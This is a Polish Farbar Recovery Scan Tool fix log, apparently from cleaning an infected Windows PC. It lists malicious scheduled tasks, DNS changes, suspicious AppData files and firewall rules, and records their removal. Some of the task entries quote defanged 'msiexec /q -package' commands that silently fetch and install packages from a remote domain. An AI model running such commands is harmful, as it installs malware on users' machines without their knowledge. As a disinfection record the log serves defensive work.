Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 3-07-2019
Uruchomiony przez Admin (09-07-2019 11:07:25) Run:1
Uruchomiony z C:\Users\Admin\Desktop
Załadowane profile: Admin (Dostępne profile: Admin)
Tryb startu: Normal
==============================================

fixlist - zawartość:
*****************
CloseProcesses:
CreateRestorePoint:
EmptyTemp:
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {d28d5708-70a2-11e9-8253-54e1ad37d8c9} - "G:\HiSuiteDownLoader.exe" 
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\...\MountPoints2: {ebcb9655-4114-11e9-8249-54e1ad37d8c9} - "E:\HiSuiteDownLoader.exe" 
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk [2018-06-10]
ShortcutTarget: hide.me vpn.lnk ->  (Brak pliku)
GroupPolicy: Ograniczenia ? <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
Task: {02D0BE1F-6DA9-40A6-884A-0117C668FBDB} - System32\Tasks\Opera scheduled Autoupdate 1555496896 => C:\Users\Admin\AppData\Local\Programs\Opera\launcher.exe [1519640 2019-07-03] (Opera Software AS -> Opera Software)
Task: {2DC9C70D-5375-48D3-9C03-2BF318A3D057} - System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => C:\Program Files\Opera\Launcher.exe
Task: {2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB} - System32\Tasks\atuspirahjizy => "msiexec" /q -package hxxps://guardname.net/ireojlqn.vao <==== UWAGA
Task: {3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51} - System32\Tasks\uaieoe => "msiexec" -package hxxps://guardname.net/lnopgvliuepry.ito /q <==== UWAGA
Task: {631A661E-E721-48C3-85B4-9F44BEE0D0B4} - System32\Tasks\GoogleCheckService => C:\Users\Admin\AppData\Local\Programs\Opera\58.0.3135.127\opera.exe <==== UWAGA
Task: {64C1418E-014A-4557-A68D-DB9F826005F9} - System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => C:\Users\Admin\YYiiRubU.exe
Task: {AC22B376-CEAA-4841-98CB-FCBA3BD21B8F} - System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe [59904 2018-04-12] (Microsoft Windows -> Microsoft Corporation) <==== UWAGA
Tcpip\..\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}: [NameServer] 208.67.222.222 208.67.220.220
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [NameServer] 95.216.188.196,185.4.64.13,185.162.128.148,208.67.222.222,208.67.220.220
Tcpip\..\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}: [DhcpNameServer] 150.204.1.2
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://lenovo17win10.msn.com/?pc=LCTE
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> DefaultScope {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = 
SearchScopes: HKU\S-1-5-21-2392927722-2977143306-2196907431-1001 -> {0A2E1844-0585-446D-B39E-4DD1FED6B322} URL = 
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} -  Brak pliku
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - hxxp://clients2.google.com/service/update2/crx
2019-01-13 20:52 - 2019-03-23 14:00 - 006387208 _____ () C:\Users\Admin\AppData\Local\dump007.dat
2018-04-12 01:34 - 2018-04-12 01:34 - 000059904 ____N (Microsoft Corporation) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe
2018-08-18 15:51 - 2018-08-18 15:51 - 000000002 _____ () C:\Users\Admin\AppData\Local\imw.ini
2018-09-27 15:25 - 2018-04-12 01:34 - 001626536 _____ (Microsoft Corporation) C:\Users\Admin\AppData\Local\user32.dll
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Brak pliku
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:3or4kl4x13tuuug3Byamue2s4b [87]
AlternateDataStreams: C:\Users\Admin\Desktop\Tobiasz.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
FirewallRules: [{A6A5C7A9-027C-4F42-B541-F2D562CDB229}] => (Allow) LPort=8318
FirewallRules: [{03E16E48-3B2F-4299-9D9B-C178D808E40D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{64D280BB-BC56-4A29-8095-97627A02F28D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B4E0157D-362D-4F31-93FB-A738B532D361}] => (Allow) C:\WINDOWS\SysWOW64\EdCFORXI.exe (Microsoft Corporation) [Brak podpisu cyfrowego]
FirewallRules: [{37142FAD-4D3C-4991-8CCD-54E2A556D162}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}] => (Allow) C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{ACD8B314-E01F-476A-AA61-D6C350FEB771}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{F0E66E77-806F-4A19-84BA-1EEBF76D4704}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E18CB599-659E-4288-855B-035B26940DCD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{72830BD2-1A95-43F3-BF8F-804003820D45}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}] => (Allow) C:\WINDOWS\SysWOW64\tracert.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D8FCF870-ED67-414A-A813-2786CF4A03B0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{917D6863-D5F5-4FC0-B1B6-F142306DE630}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{D21E1A99-3F8B-488B-9092-43E05A791718}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}] => (Allow) C:\WINDOWS\SysWOW64\nslookup.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{47260107-8610-4B2D-86D8-A482C109EE1A}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{6D0E8727-8D15-4B68-96E0-B760C23F4897}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{115C1C19-86D9-4C46-B6A7-06865E5A617D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{C7E30ACE-DABD-4219-AAF4-53E3192A3488}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{382BAA1D-2454-4607-AFF9-2013F9C517A5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{05458F64-71B7-4D7B-B787-50DEF3E7DC17}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{66422008-3EAC-430D-A4F3-E8789E4EBFEA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{528EC959-68F4-4299-B77A-51BD0FFAB752}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{824589D8-984E-4791-9AA2-0AF6AB96114D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BC439E86-3C2D-487D-90CD-A8027DCD0163}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{FA7E57DE-46E9-44CC-90A1-C12FD2953734}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{B27242ED-E50E-4991-BEF1-5D36B6767A8A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{CCB36B66-169F-48AE-8335-FB65681580C3}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{90358491-0F7E-4902-9E7A-387A36921D8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{BD26266C-9665-49F5-BB53-9A6D5F1440E1}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{15BBFBDA-FC59-4850-BE98-96D862905272}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{183568B8-EC84-4799-A0A0-6118469003BD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{9C431AB2-41D6-4B90-AF9C-28373F77D83D}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{F04F5A38-DC16-414D-B0AD-BD65FD675285}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{17146151-E038-482B-ABBF-1C65287CF97D}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{47A422BE-ADBB-49AD-A26C-F9F2785101BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{A3AD3CFA-F373-40E5-818A-DF60D217637B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{45F871DF-A008-4433-8F52-589FA43D706C}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{408F5652-536C-47D8-A149-D9DEE0526756}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{C9334AA3-9765-4478-A9D6-8F714A7223DF}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{71E63A59-3089-4274-9D33-3AD38A2BD5B6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{79F00C57-D74A-4787-9048-855974AD2632}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
FirewallRules: [{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation)
FirewallRules: [{4C098975-9938-4F0D-BB32-725DC1EA1DC4}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe (Microsoft Windows -> InstallShield Software Corporation)
Hosts:
RemoveProxy:
CMD: netsh int ip reset
CMD: ipconfig /flushdns
FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini
FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini

*****************

Procesy zostały pomyślnie zamknięte.
Punkt przywracania został pomyślnie utworzony.
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d28d5708-70a2-11e9-8253-54e1ad37d8c9} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{d28d5708-70a2-11e9-8253-54e1ad37d8c9} => nie znaleziono
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ebcb9655-4114-11e9-8249-54e1ad37d8c9} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{ebcb9655-4114-11e9-8249-54e1ad37d8c9} => nie znaleziono
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hide.me vpn.lnk => pomyślnie przeniesiono
"ShortcutTarget: hide.me vpn.lnk ->  (Brak pliku)" => nie znaleziono
C:\WINDOWS\system32\GroupPolicy\Machine => pomyślnie przeniesiono
C:\WINDOWS\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono
C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini => pomyślnie przeniesiono
C:\WINDOWS\system32\GroupPolicy\User => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{02D0BE1F-6DA9-40A6-884A-0117C668FBDB}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{02D0BE1F-6DA9-40A6-884A-0117C668FBDB}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1555496896 => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Opera scheduled Autoupdate 1555496896" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2DC9C70D-5375-48D3-9C03-2BF318A3D057}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2DC9C70D-5375-48D3-9C03-2BF318A3D057}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{4F04615B-4F86-A938-1472-6495690C244B} => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{4F04615B-4F86-A938-1472-6495690C244B}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2F1CB3F8-F14C-477A-A08D-719B5BA3B4DB}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\atuspirahjizy => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\atuspirahjizy" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3EFC394D-C0A1-41F5-9305-8E9CCDBCAC51}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\uaieoe => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\uaieoe" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{631A661E-E721-48C3-85B4-9F44BEE0D0B4}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{631A661E-E721-48C3-85B4-9F44BEE0D0B4}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\GoogleCheckService => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleCheckService" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{64C1418E-014A-4557-A68D-DB9F826005F9}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{64C1418E-014A-4557-A68D-DB9F826005F9}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0} => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{55F6BAE8-1E3E-EBC1-ACA9-04F792F189D0}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AC22B376-CEAA-4841-98CB-FCBA3BD21B8F}" => pomyślnie usunięto
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC22B376-CEAA-4841-98CB-FCBA3BD21B8F}" => pomyślnie usunięto
C:\WINDOWS\System32\Tasks\{987801ED-4C56-F6FF-CA13-E3A13116E3CD} => pomyślnie przeniesiono
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{987801ED-4C56-F6FF-CA13-E3A13116E3CD}" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{00664684-73f1-4cba-aa09-d11d6f3938c9}\\NameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{1f5df075-51bc-4453-827f-885c1e62f828}\\NameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}\\NameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{52bbde83-89fb-4f71-8a72-464448fb44a4}\\DhcpNameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}\\NameServer" => pomyślnie usunięto
"HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{6fd783af-d458-4003-a114-18240951edaf}\\DhcpNameServer" => pomyślnie usunięto
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono
"HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\Software\Microsoft\Internet Explorer\Main\\Secondary Start Pages" => pomyślnie usunięto
"HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => pomyślnie usunięto
HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0A2E1844-0585-446D-B39E-4DD1FED6B322} => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{0A2E1844-0585-446D-B39E-4DD1FED6B322} => nie znaleziono
HKLM\Software\Classes\PROTOCOLS\Handler\sacore => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{5513F07E-936B-4E52-9B00-067394E91CC5} => nie znaleziono
HKLM\SOFTWARE\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fheoggkfdfchfphceeifdbepaooicaho => pomyślnie usunięto
C:\Users\Admin\AppData\Local\dump007.dat => pomyślnie przeniesiono
C:\Users\Admin\AppData\Local\hUEekkeViYFiD.exe => pomyślnie przeniesiono
C:\Users\Admin\AppData\Local\imw.ini => pomyślnie przeniesiono
C:\Users\Admin\AppData\Local\user32.dll => pomyślnie przeniesiono
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => pomyślnie usunięto
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => nie znaleziono
C:\Users\Admin\Desktop\Tobiasz.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS pomyślnie usunięto
C:\Users\Admin\Desktop\Tobiasz.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A6A5C7A9-027C-4F42-B541-F2D562CDB229}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{03E16E48-3B2F-4299-9D9B-C178D808E40D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CF48F6C4-858E-4E73-A933-A71F1F6F4FEE}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{64D280BB-BC56-4A29-8095-97627A02F28D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B4E0157D-362D-4F31-93FB-A738B532D361}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{37142FAD-4D3C-4991-8CCD-54E2A556D162}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5B4E7D8A-B6FF-4219-A7B8-84BDA65D21C7}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0ECE455A-0DF1-4529-85A9-B356C51AB0AB}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ACD8B314-E01F-476A-AA61-D6C350FEB771}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F0E66E77-806F-4A19-84BA-1EEBF76D4704}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E18CB599-659E-4288-855B-035B26940DCD}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{72830BD2-1A95-43F3-BF8F-804003820D45}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{3DF174C1-ABB4-4BD0-A38F-880CB104A5A5}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D8FCF870-ED67-414A-A813-2786CF4A03B0}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{917D6863-D5F5-4FC0-B1B6-F142306DE630}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5AA4C11C-BFF9-4D8A-ACD9-462B7A1558DC}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D21E1A99-3F8B-488B-9092-43E05A791718}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{75C2FF55-35B8-4BBE-8A80-70A97CFDD3B9}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2AC51EDF-E7AF-4A15-85B3-E36EF0FD0A06}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{47260107-8610-4B2D-86D8-A482C109EE1A}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6D0E8727-8D15-4B68-96E0-B760C23F4897}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{115C1C19-86D9-4C46-B6A7-06865E5A617D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0A851A54-5ADF-45A8-A289-169AF0E4AAA0}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C7E30ACE-DABD-4219-AAF4-53E3192A3488}" => pomyślnie usunięto
